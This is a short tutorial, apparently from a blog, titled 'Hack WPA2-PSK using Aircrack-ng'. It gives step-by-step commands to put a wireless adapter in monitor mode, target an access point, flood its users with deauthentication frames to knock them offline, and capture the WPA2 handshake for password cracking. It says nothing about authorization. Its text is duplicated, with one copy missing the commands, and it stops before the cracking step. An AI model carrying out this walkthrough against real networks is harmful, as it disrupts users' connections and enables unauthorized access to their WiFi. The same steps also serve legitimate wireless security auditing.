Hack WPA2-PSK using Aircrack-ng
Aircrack-ng is a complete suite of tools to assess WiFi network security.
It focuses on different areas of WiFi security:
- Monitoring: Packet capture and export of data to text files for further processing by third party tools;
- Attacking: Replay attacks, deauthentication, fake access points and others via packet injection;
- Testing: Checking WiFi cards and driver capabilities (capture and injection);
- Cracking: WEP and WPA PSK (WPA 1 and 2). Official site.
Aircrack-ng is a network software suite consisting of a detector, packet sniffer, WEP and WPA/WPA2-PSK cracker and analysis tool for 802.11 wireless LANs. It works with any wireless network interface controller whose driver supports raw monitoring mode and can sniff 802.11a, 802.11b and 802.11g traffic. Packages are released for Linux and Windows. Wikipedia.
Install Aircrack-ng using apt:
Switch wireless adapter in monitor mode:
Capture traffic with Airodump-ng:
Focus on target SSID:
-c 6 - channel of access point.
"out_file" - output file name.
Send deauth command:
Capture handshake.
In previous step we dropped user from their WiFi and now when they re-authenticate, airodump-ng will attempt to grab their password in the new 4-way handshake. Now open airodump-ng terminal and check top right side. You must see something like this:
Now you need decrypt received WPA2 handshake.
It focuses on different areas of WiFi security:
- Monitoring: Packet capture and export of data to text files for further processing by third party tools;
- Attacking: Replay attacks, deauthentication, fake access points and others via packet injection;
- Testing: Checking WiFi cards and driver capabilities (capture and injection);
- Cracking: WEP and WPA PSK (WPA 1 and 2). Official site.
Aircrack-ng is a network software suite consisting of a detector, packet sniffer, WEP and WPA/WPA2-PSK cracker and analysis tool for 802.11 wireless LANs. It works with any wireless network interface controller whose driver supports raw monitoring mode and can sniff 802.11a, 802.11b and 802.11g traffic. Packages are released for Linux and Windows. Wikipedia.
Install Aircrack-ng using apt:
sudo apt install aircrack-ng -y
Switch wireless adapter in monitor mode:
sudo airmon-ng start wlan0"wlan0" - name of wireless adapter. After this command his name will changed to wlan0mon.
Capture traffic with Airodump-ng:
sudo airodump-ng wlan0mon
Focus on target SSID:
sudo airodump-ng --bssid 00:00:00:00:00:00 -c 6 --write out_file wlan0mon"00:00:00:00:00:00" - BSSID of target access point.
-c 6 - channel of access point.
"out_file" - output file name.
Send deauth command:
sudo aireplay-ng --deauth 100 -a 00:00:00:00:00:00 wlan0mon100 - number of de-authenticate frames.
Capture handshake.
In previous step we dropped user from their WiFi and now when they re-authenticate, airodump-ng will attempt to grab their password in the new 4-way handshake. Now open airodump-ng terminal and check top right side. You must see something like this:
WPA handshake: FF:FF:FF:FF:FF:FF
Now you need decrypt received WPA2 handshake.
Support me on Patreon
#802.11 #aircrack-ng #airspoof #debian #linux #ubuntu #wifi
